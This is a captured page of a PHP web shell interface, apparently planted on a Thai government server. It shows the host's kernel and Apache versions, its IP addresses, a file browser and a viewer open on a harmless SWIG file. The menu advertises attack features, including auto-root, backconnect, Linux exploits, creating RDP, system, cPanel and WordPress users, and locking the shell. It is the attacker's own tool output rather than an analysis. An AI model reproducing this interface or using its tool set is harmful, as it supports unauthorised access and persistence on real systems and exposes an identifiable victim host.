Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
swig /
1.3.40 /
mzscheme /
[ HOME SHELL ]
Name
Size
Permission
Action
mzrun.swg
14.9
KB
-rw-r--r--
mzscheme.swg
1.96
KB
-rw-r--r--
std_common.i
673
B
-rw-r--r--
std_deque.i
28
B
-rw-r--r--
std_map.i
63.12
KB
-rw-r--r--
std_pair.i
42.92
KB
-rw-r--r--
std_string.i
1.56
KB
-rw-r--r--
std_vector.i
17.55
KB
-rw-r--r--
stl.i
518
B
-rw-r--r--
typemaps.i
9.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : std_common.i
/* ----------------------------------------------------------------------------- * See the LICENSE file for information on copyright, usage and redistribution * of SWIG, and the README file for authors - http://www.swig.org/release.html. * * std_common.i * * SWIG typemaps for STL - common utilities * ----------------------------------------------------------------------------- */ %include <std/std_except.i> %apply size_t { std::size_t }; %{ #include <string> std::string swig_scm_to_string(Scheme_Object* x) { return std::string(SCHEME_STR_VAL(x)); } Scheme_Object* swig_make_string(const std::string& s) { return scheme_make_string(s.c_str()); } %}
Close